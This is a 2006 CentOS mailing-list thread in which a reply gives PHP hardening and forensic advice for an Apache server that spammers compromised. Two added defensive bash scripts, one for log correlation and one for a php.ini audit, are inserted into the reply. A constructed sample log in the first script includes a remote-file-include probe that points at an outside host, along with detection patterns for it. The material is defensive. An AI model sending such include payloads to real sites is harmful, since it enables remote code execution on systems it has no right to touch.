[CentOS] Apache Security

King, John (Greg) (LMIT-HOU) Greg.King at lmit.com
Thu Jun 22 17:25:49 UTC 2006


Just as an FYI, here is a good checklist for Linux (not comprehensive, but a
good start):
http://www.cisecurity.org/bench_linux.html

And there are some good resources via Google on secure CentOS installations.

If they do it again, then it won't be your Perl script, obviously, as you
mentioned disabling the script; but if not, is your script configured
with 'use strict' and taint mode? Is every variable in the script checked to
ensure the data is within an allowed range? Does the Perl script rely on
third-party modules? If so, you might check there as well.

The rest assumes that you may have PHP installed on the system and that
someone may have used a PHP script as a gateway into your system.

Even though the box has been compromised, you may get lucky, if this is
related to Apache, by looking at the timestamps on the files in /tmp and
correlating those with your Apache logs.

If so, check your PHP logs as well (if you enabled them in /etc/php.ini).
Are you running in safe mode? There are some things you can do to help
reduce the amount of damage a vulnerable PHP script can do:

safe_mode = On
safe_mode_gid = On
safe_mode_include_dir = <path where any include files you trust reside; read-only by the apache process>
safe_mode_exec_dir = <path to the area where you allow any executables to be called from PHP scripts>

Also (not restricted to safe mode), if this is a home server, you can
restrict where PHP scripts can 'roam':
open_basedir = /var/www/html    (for example) will prevent PHP scripts
from going outside the /var/www/html area.

If you're done debugging any web code, set this:
display_errors = off

And turn on PHP file logging:
log_errors = On
error_log = /var/log/phplogfilename.log 

Unless you need to allow file uploads, turn that off too:
file_uploads = Off

The same goes for treating URLs as files:
allow_url_fopen = Off

Also, make sure all the files in /var/www/html (or wherever) are not owned
by the apache process, so they cannot be overwritten, if at all possible.


-Greg
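The timestamp correlation Greg suggests, written out as an added example (this is not code from the thread): take the mtime of what the apache user left in /tmp, pull the access_log entries from the minutes before it, and tag the ones that look like a PHP remote-include probe or scripted tool traffic. It assumes bash and GNU coreutils (as on CentOS), Apache's Combined Log Format, and log timestamps in the same timezone as the filesystem clock. The sample log lines, the IP addresses and the /gallery/view.php path are constructed for the example, not taken from the original post.

```shell
#!/bin/bash
# Added example, not from the original thread: correlate the mtime of files the
# apache user dropped in /tmp with requests in the Apache access_log, and flag
# the requests that look like remote-file-include probes or tool traffic.
# Assumptions: bash, GNU coreutils (CentOS), Combined Log Format, log timestamps
# in the same timezone as the filesystem clock.

# Constructed sample access_log for this example (not a real capture).
SAMPLE_LOG='10.0.0.5 - - [22/Jun/2006:11:40:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Jun/2006:11:51:58 +0000] "GET /gallery/view.php?page=http://198.51.100.7/c.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
10.0.0.9 - - [22/Jun/2006:11:52:10 +0000] "POST /gallery/view.php HTTP/1.1" 200 88 "-" "libwww-perl/5.805"
10.0.0.5 - - [22/Jun/2006:12:15:44 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'

# "22/Jun/2006:11:51:58" -> "2006-06-22 11:51:58", the layout `stat -c %y` uses,
# so a file mtime and a log timestamp can be compared directly.
apache_ts_to_iso() {
    local ts=$1 d mon y hms m
    d=${ts%%/*};   ts=${ts#*/}
    mon=${ts%%/*}; ts=${ts#*/}
    y=${ts%%:*};   hms=${ts#*:}
    case $mon in
        Jan) m=01;; Feb) m=02;; Mar) m=03;; Apr) m=04;; May) m=05;; Jun) m=06;;
        Jul) m=07;; Aug) m=08;; Sep) m=09;; Oct) m=10;; Nov) m=11;; Dec) m=12;;
        *) return 1;;
    esac
    printf '%s-%s-%s %s\n' "$y" "$m" "$d" "$hms"
}

# "2006-06-22 11:51:58" -> 20060622115158: an integer key, so the window test
# does not depend on the shell's locale-dependent string collation.
ts_key() { local k=${1//[^0-9]/}; printf '%s\n' "${k:-0}"; }

# Print every log line whose timestamp falls inside [START, END] (ISO strings).
requests_in_window() {
    local file=$1 start=$2 end=$3 line ts iso k
    local s=$(ts_key "$start") e=$(ts_key "$end")
    while IFS= read -r line; do
        ts=${line#*\[}; ts=${ts%% *}          # text between '[' and the space
        iso=$(apache_ts_to_iso "$ts") || continue
        k=$(ts_key "$iso")
        if (( k >= s && k <= e )); then
            printf '%s\n' "$line"
        fi
    done < "$file"
}

# Tag lines on stdin that carry a URL in the query string (classic PHP
# remote-include attempt), POST to a PHP script, or come from libwww-perl,
# the client many 2006-era spam droppers used. Untagged lines are dropped.
flag_suspicious() {
    local line req ua why
    while IFS= read -r line; do
        req=${line#*\"}; req=${req%%\"*}      # GET /x.php?... HTTP/1.1
        ua=${line%\"};   ua=${ua##*\"}        # last quoted field
        why=""
        case $req in *=http://*|*=https://*|*=ftp://*) why="$why remote-url-in-query";; esac
        case $req in POST\ *.php*) why="$why post-to-php";; esac
        case $ua in libwww-perl*) why="$why scripted-client";; esac
        if [ -n "$why" ]; then
            printf '%s |%s\n' "$line" "$why"
        fi
    done
}

# On the real box: mtimes of what the apache user left in /tmp, as ISO strings
# (GNU find/stat; run this first, then feed the times to requests_in_window).
apache_tmp_files() {
    local dir=${1:-/tmp} user=${2:-apache}
    find "$dir" -user "$user" -exec stat -c '%y|%n' {} + 2>/dev/null |
        awk -F'|' '{ print substr($1, 1, 19), $2 }'
}

# Demo on the constructed log: say a dropper directory turned up in /tmp with
# mtime 2006-06-22 11:52:10, so look at the five minutes leading up to it.
LOGFILE=$(mktemp); printf '%s\n' "$SAMPLE_LOG" > "$LOGFILE"
trap 'rm -f "$LOGFILE"' EXIT
requests_in_window "$LOGFILE" '2006-06-22 11:47:10' '2006-06-22 11:52:10' | flag_suspicious
```

On a live box, run apache_tmp_files first, then hand each mtime (and a few minutes before it) to requests_in_window; remember the log times are only as good as the server clock, and that a dropper that ran for a while may have an mtime well after the request that created it.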
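To check a box against the php.ini settings recommended above, here is an added example (not from the thread) that reads a php.ini and reports every directive that deviates from the hardened value: display_errors, log_errors, file_uploads, allow_url_fopen, plus an unset open_basedir. It only covers directives that still exist in current PHP; safe_mode and the safe_mode_* directives were deprecated in PHP 5.3 and removed in 5.4, so on a PHP 4/5.x box from the era of this thread add them to the list, on anything newer they do nothing. The two sample php.ini files are constructed for the example, and the parser assumes the plain "key = value" syntax with ';' comments and unquoted values.

```shell
#!/bin/bash
# Added example, not from the original thread: audit a php.ini against the
# hardening values recommended above and report each deviation.
# Assumptions: "key = value" lines, ';' comments, unquoted values; the last
# uncommented assignment of a key wins, as it does in PHP.

# key=expected pairs from the thread. open_basedir is checked separately for
# "set to anything", since the right path is site-specific.
HARDENED="display_errors=Off log_errors=On file_uploads=Off allow_url_fopen=Off"

# Constructed sample: a typical out-of-the-box php.ini of the period.
WEAK_INI=$(mktemp); GOOD_INI=$(mktemp)
trap 'rm -f "$WEAK_INI" "$GOOD_INI"' EXIT
cat > "$WEAK_INI" <<'EOF'
; constructed sample php.ini (weak)
display_errors = Off
log_errors = Off
file_uploads = On
allow_url_fopen = On
; a later assignment overrides an earlier one, exactly as PHP does
display_errors = On
EOF
# Constructed sample: the thread's recommended settings applied.
cat > "$GOOD_INI" <<'EOF'
; constructed sample php.ini (hardened)
display_errors = Off
log_errors = On
error_log = /var/log/php_errors.log
file_uploads = Off
allow_url_fopen = Off
open_basedir = /var/www/html
EOF

# Effective value of a directive in FILE, or "" if it is never set.
ini_get() {
    local file=$1 key=$2 line k v val=""
    while IFS= read -r line; do
        line=${line%%;*}                              # strip comments
        case $line in *=*) ;; *) continue;; esac
        k=${line%%=*}; v=${line#*=}
        k=${k#"${k%%[![:space:]]*}"}; k=${k%"${k##*[![:space:]]}"}   # trim
        v=${v#"${v%%[![:space:]]*}"}; v=${v%"${v##*[![:space:]]}"}
        [ "$k" = "$key" ] && val=$v
    done < "$file"
    printf '%s\n' "$val"
}

# Normalise PHP's boolean spellings: 1/On/True/Yes are true, anything else false.
ini_bool() {
    case $(printf '%s' "$1" | tr '[:upper:]' '[:lower:]') in
        1|on|true|yes) echo on;;
        *)             echo off;;
    esac
}

# Print one FINDING line per deviation; the return value is the finding count.
# An unset directive counts as a finding: PHP's built-in defaults are the
# permissive ones (display_errors On, file_uploads On, allow_url_fopen On).
audit_php_ini() {
    local file=$1 pair key want have n=0
    for pair in $HARDENED; do
        key=${pair%%=*}; want=${pair#*=}
        have=$(ini_get "$file" "$key")
        if [ -z "$have" ] || [ "$(ini_bool "$have")" != "$(ini_bool "$want")" ]; then
            printf 'FINDING %s = %s (expected %s)\n' "$key" "${have:-<unset>}" "$want"
            n=$((n + 1))
        fi
    done
    if [ -z "$(ini_get "$file" open_basedir)" ]; then
        printf 'FINDING open_basedir is unset (scripts may read wherever the apache user can)\n'
        n=$((n + 1))
    fi
    return $n
}

# Demo on the constructed files; on a real box point it at /etc/php.ini.
echo "== weak =="; audit_php_ini "$WEAK_INI" || echo "$? finding(s)"
echo "== hardened =="; audit_php_ini "$GOOD_INI" || echo "$? finding(s)"
```

The audit reads only the main php.ini; if the distribution also loads /etc/php.d/*.ini or a per-vhost php_admin_value in httpd.conf, those override it, so confirm the effective values with `php -i` (or a phpinfo() page you delete afterwards) rather than trusting the file alone.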


-----Original Message-----
From: centos-bounces at centos.org [mailto:centos-bounces at centos.org] On
Behalf Of Matthew T. O'Connor
Sent: Thursday, June 22, 2006 11:53 AM
To: CentOS mailing list
Subject: [CentOS] Apache Security

Hello, I have a server running CentOS 4.3 with all the latest updates. 
The server in question has been hacked by spammers a few times.  The
details of the hack have been basically the same every time.  I find
some directory created by the apache user account in /tmp.  The new
directory contains an HTML file, a list of email addresses to spam,
and a Perl script that spams all those email addresses with the HTML
file.

My question is: why is this happening?  Obviously it's some Apache
exploit.  I have removed mod_perl; that didn't help.  I have now changed
the permissions on the perl executable; that might help, we will see, but
that doesn't address the core problem.  How is it that someone can
upload arbitrary files to my server and then execute an arbitrary
command via Apache?

Is this a known problem?  Have others seen it?  What can I do to help
prevent this?

Thanks,

Matt
_______________________________________________
CentOS mailing list
CentOS at centos.org
http://lists.centos.org/mailman/listinfo/centos